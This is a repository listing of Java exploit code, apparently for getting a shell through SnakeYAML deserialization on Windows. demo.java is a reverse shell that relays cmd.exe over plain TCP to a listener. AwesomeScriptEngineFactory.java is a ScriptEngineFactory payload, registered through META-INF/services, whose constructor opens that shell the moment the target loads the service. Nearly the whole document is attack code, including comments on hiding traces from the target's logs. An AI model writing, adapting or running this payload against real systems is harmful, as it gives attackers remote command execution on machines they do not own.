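// Repository listing this page was extracted from (the remaining files are shown further
// down the page):
//   README.md
//   demo.java                                                            (this file)
//   yaml-payload-master/src/META-INF/services/javax.script.ScriptEngineFactory
//       one line: artsploit.AwesomeScriptEngineFactory  (the ServiceLoader registration)
//   yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.java
//   yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.class  (prebuilt binary)
//
// README.md, translated: "yaml-payload-for-Win — a yaml-payload for a Windows reverse
// shell". Write-up linked from the README:
// https://bkfish.gitee.io/2021/06/26/%E8%AE%B0%E4%B8%80%E6%AC%A1%E8%8B%A5%E4%BE%9Dcms%E5%90%8E%E5%8F%B0getshell/
//
// demo.java

/**
 * Stand-alone Windows reverse-shell harness: spawns {@code cmd.exe} and pumps its
 * stdin/stdout over a TCP connection to a listener. It is the same loop that
 * {@code artsploit.AwesomeScriptEngineFactory} runs from its constructor, kept here so the
 * shell can be exercised directly ({@code java demo HOST PORT}) before it is packaged as
 * a ScriptEngineFactory payload.
 *
 * <p>For authorized testing only. The channel is plain TCP: every command and its output
 * crosses the network unencrypted and unauthenticated, and anyone who can reach the
 * listener port sees and can inject into the session.
 *
 * <p>Changes from the original template: the listener is taken from the command line
 * instead of the non-compiling placeholders ({@code host="xxx"}, {@code int port=port;});
 * the socket is connected before {@code cmd.exe} is started so an unreachable listener no
 * longer leaves an orphaned shell behind; the process and socket are closed in
 * {@code finally}; and a peer that hangs up is detected (the original polled
 * {@code available()} only and spun until {@code cmd.exe} exited).
 */
public class demo {

    /** Shell spawned on the target; its stderr is merged into stdout before being sent. */
    private static final String SHELL = "cmd.exe";

    /** Poll cadence of the pump loop, in milliseconds (also the socket read timeout). */
    private static final int POLL_MS = 50;

    /**
     * Entry point.
     *
     * @param args {@code [listener-host, listener-port]}
     * @throws java.io.IOException if the connection or the shell cannot be established, or
     *     the session breaks while pumping
     * @throws InterruptedException declared for compatibility with the original signature
     * @throws NumberFormatException if the port argument is not an integer
     */
    public static void main(String[] args) throws java.io.IOException, InterruptedException {
        if (args.length != 2) {
            System.err.println("usage: java demo <listener-host> <listener-port>");
            System.exit(2);
        }
        String host = args[0];
        int port = Integer.parseInt(args[1]);

        // Connect first: if the listener is down nothing has been spawned yet.
        java.net.Socket sock = new java.net.Socket(host, port);
        try {
            Process shell = new ProcessBuilder(SHELL).redirectErrorStream(true).start();
            try {
                pump(shell, sock);
            } finally {
                shell.destroy();
            }
        } finally {
            sock.close();
        }
    }

    /**
     * Relays shell output to the peer and peer input to the shell until the shell exits,
     * the peer hangs up, or the socket is closed locally.
     */
    private static void pump(Process shell, java.net.Socket sock) throws java.io.IOException {
        java.io.InputStream fromShell = shell.getInputStream(); // stdout + stderr (merged)
        java.io.OutputStream toShell = shell.getOutputStream();
        java.io.InputStream fromPeer = sock.getInputStream();
        java.io.OutputStream toPeer = sock.getOutputStream();
        byte[] buf = new byte[4096];

        // A timed blocking read paces the loop (replacing Thread.sleep) and, unlike
        // available(), returns -1 when the peer closes the connection.
        sock.setSoTimeout(POLL_MS);
        while (!sock.isClosed()) {
            // Sample liveness before draining so output written just before exit is relayed.
            boolean exited = hasExited(shell);
            drain(fromShell, toPeer, buf);
            toPeer.flush();
            if (exited) {
                break; // e.g. the operator typed "exit"
            }
            int n;
            try {
                n = fromPeer.read(buf);
            } catch (java.net.SocketTimeoutException noInputThisTick) {
                continue;
            }
            if (n < 0) {
                break; // peer hung up
            }
            toShell.write(buf, 0, n);
            toShell.flush();
        }
    }

    /** Moves whatever is already buffered on {@code in} to {@code out} without blocking. */
    private static void drain(java.io.InputStream in, java.io.OutputStream out, byte[] buf)
            throws java.io.IOException {
        int avail;
        while ((avail = in.available()) > 0) {
            int n = in.read(buf, 0, Math.min(avail, buf.length));
            if (n <= 0) {
                return;
            }
            out.write(buf, 0, n);
        }
    }

    /** True once the process has terminated; {@code exitValue()} throws while it runs. */
    private static boolean hasExited(Process p) {
        try {
            p.exitValue();
            return true;
        } catch (IllegalThreadStateException stillRunning) {
            return false;
        }
    }
}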
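// yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.java
//
// A prebuilt AwesomeScriptEngineFactory.class is committed next to this source:
//   https://raw.githubusercontent.com/bkfish/yaml-payload-for-Win/a9869eaedbda3a3814c2be230d09ced4d8a16934/yaml-payload-master/src/artsploit/AwesomeScriptEngineFactory.class
// Its bytecode cannot be audited from this listing and its embedded host/port are unknown;
// rebuild the class from this source after setting HOST/PORT instead of reusing the binary.
//
// Registered via yaml-payload-master/src/META-INF/services/javax.script.ScriptEngineFactory
// (contents: "artsploit.AwesomeScriptEngineFactory").
package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
import java.net.SocketTimeoutException;
import java.util.Collections;
import java.util.List;

/**
 * ScriptEngineFactory whose no-arg constructor runs a Windows reverse shell.
 *
 * <p>This is the artsploit "yaml-payload" technique adapted to Windows ({@code cmd.exe}).
 * The class is listed in {@code META-INF/services/javax.script.ScriptEngineFactory}, so any
 * code that iterates that service — {@code ScriptEngineManager} does on construction —
 * instantiates it through {@code ServiceLoader}, and the constructor is the payload. No
 * engine is actually provided: every factory method returns an empty or null value.
 *
 * <p>For authorized testing only. Operational caveats a reviewer should know:
 * the session is plain, unauthenticated TCP; the constructor blocks the thread that
 * triggered service loading for the life of the shell (a hung request on the target is
 * observable); and connection errors are intentionally not logged (see constructor).
 *
 * <p>Changes from the original: {@code int port=port;} did not compile and is now the
 * {@link #PORT} constant; the socket is connected before {@code cmd.exe} is spawned so an
 * unreachable listener no longer leaks a shell process; {@code printStackTrace()} (which
 * wrote the listener's host:port to the target's stderr) is gone; the shell process and
 * socket are closed in {@code finally}; a peer that hangs up is detected instead of
 * spinning; the list-returning methods return empty lists rather than {@code null}.
 */
public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    /** Listener host. Placeholder carried over from the template — set before building. */
    private static final String HOST = "ip";

    /** Listener port. Placeholder (the template had {@code int port=port;}) — set before building. */
    private static final int PORT = 0;

    /** Shell spawned on the target; stderr is merged into stdout. */
    private static final String SHELL = "cmd.exe";

    /** Poll cadence of the pump loop, in milliseconds (also the socket read timeout). */
    private static final int POLL_MS = 50;

    /**
     * Connects to {@link #HOST}:{@link #PORT}, spawns {@code cmd.exe} and pumps the session
     * until it ends. Returns quietly if the listener cannot be reached.
     *
     * @throws IOException if the socket cannot be closed
     * @throws InterruptedException declared for compatibility with the original signature
     */
    public AwesomeScriptEngineFactory() throws IOException, InterruptedException {
        Socket sock;
        try {
            // Connect before spawning: with an unreachable listener nothing is left running.
            sock = new Socket(HOST, PORT);
        } catch (IOException listenerUnreachable) {
            // Deliberately silent. The template's printStackTrace() put the listener address
            // into the target's logs, and throwing would surface as a ServiceConfigurationError
            // to whatever triggered the load.
            return;
        }
        try {
            Process shell = new ProcessBuilder(SHELL).redirectErrorStream(true).start();
            try {
                pump(shell, sock);
            } finally {
                shell.destroy();
            }
        } catch (IOException sessionFailed) {
            // Same reasoning as above: a broken session is not logged on the target.
        } finally {
            sock.close();
        }
    }

    /**
     * Relays shell output to the peer and peer input to the shell until the shell exits,
     * the peer hangs up, or the socket is closed locally.
     */
    private static void pump(Process shell, Socket sock) throws IOException {
        InputStream fromShell = shell.getInputStream(); // stdout + stderr (merged)
        OutputStream toShell = shell.getOutputStream();
        InputStream fromPeer = sock.getInputStream();
        OutputStream toPeer = sock.getOutputStream();
        byte[] buf = new byte[4096];

        // A timed blocking read paces the loop (replacing Thread.sleep) and, unlike
        // available(), returns -1 when the peer closes the connection.
        sock.setSoTimeout(POLL_MS);
        while (!sock.isClosed()) {
            // Sample liveness before draining so output written just before exit is relayed.
            boolean exited = hasExited(shell);
            drain(fromShell, toPeer, buf);
            toPeer.flush();
            if (exited) {
                break;
            }
            int n;
            try {
                n = fromPeer.read(buf);
            } catch (SocketTimeoutException noInputThisTick) {
                continue;
            }
            if (n < 0) {
                break; // peer hung up
            }
            toShell.write(buf, 0, n);
            toShell.flush();
        }
    }

    /** Moves whatever is already buffered on {@code in} to {@code out} without blocking. */
    private static void drain(InputStream in, OutputStream out, byte[] buf) throws IOException {
        int avail;
        while ((avail = in.available()) > 0) {
            int n = in.read(buf, 0, Math.min(avail, buf.length));
            if (n <= 0) {
                return;
            }
            out.write(buf, 0, n);
        }
    }

    /** True once the process has terminated; {@code exitValue()} throws while it runs. */
    private static boolean hasExited(Process p) {
        try {
            p.exitValue();
            return true;
        } catch (IllegalThreadStateException stillRunning) {
            return false;
        }
    }

    // ---- ScriptEngineFactory: no engine is provided, so every method is a stub. ----

    /** {@inheritDoc} Always {@code null}: this factory backs no engine. */
    @Override
    public String getEngineName() {
        return null;
    }

    /** {@inheritDoc} Always {@code null}. */
    @Override
    public String getEngineVersion() {
        return null;
    }

    /** {@inheritDoc} Empty: no file extensions are claimed. */
    @Override
    public List<String> getExtensions() {
        return Collections.emptyList();
    }

    /** {@inheritDoc} Empty: no MIME types are claimed. */
    @Override
    public List<String> getMimeTypes() {
        return Collections.emptyList();
    }

    /** {@inheritDoc} Empty: the factory is never looked up by name. */
    @Override
    public List<String> getNames() {
        return Collections.emptyList();
    }

    /** {@inheritDoc} Always {@code null}. */
    @Override
    public String getLanguageName() {
        return null;
    }

    /** {@inheritDoc} Always {@code null}. */
    @Override
    public String getLanguageVersion() {
        return null;
    }

    /** {@inheritDoc} Always {@code null}, whatever the key. */
    @Override
    public Object getParameter(String key) {
        return null;
    }

    /** {@inheritDoc} Always {@code null}. */
    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    /** {@inheritDoc} Always {@code null}. */
    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    /** {@inheritDoc} Always {@code null}. */
    @Override
    public String getProgram(String... statements) {
        return null;
    }

    /** {@inheritDoc} Always {@code null}: there is no engine to hand out. */
    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}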